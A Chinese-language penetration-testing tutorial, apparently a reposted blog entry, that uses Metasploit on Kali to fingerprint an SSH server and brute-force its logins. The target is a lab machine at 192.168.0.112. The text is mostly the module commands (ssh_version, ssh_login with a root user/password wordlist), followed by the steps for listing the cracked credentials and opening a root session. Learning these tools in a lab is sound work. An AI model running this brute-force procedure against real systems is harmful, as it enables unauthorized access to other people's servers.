当前位置: 代码迷 >> 综合 >> 2022-渗透测试-信息收集-Metasploit(基于SSH协议)
  详细解决方案

2022-渗透测试-信息收集-Metasploit(基于SSH协议)

热度:65   发布时间:2023-12-24 00:16:47.0

目录

1.查看SSH服务的版本信息

 2.对ssh进行暴力破解

1.查看SSH服务的版本信息

打开kali系统的Metasploit软件。

search version

 2.use auxiliary/scanner/ssh/ssh_version

3.show options

 4.set RHOSTS 192.168.0.112  设置目标主机-靶机

5.run

 版本是:SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 

 2.对ssh进行暴力破解

1.search ssh_login

 2.使用模块use auxiliary/scanner/ssh/ssh_login

 3.查看需要配置的参数show options

4.设置目标主机 set RHOSTS 192.168.0.112

5.设置字典

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

 这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。

 6.将破解的详细信息打印出来 set VERBOSE true

 7.run

 8.creds 列出所有数据库中的凭据,也就是账号和密码

 9.sessions 查看会话

 10. 进入会话 sessions -i 1

此时,我们是以root用户进来的。

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.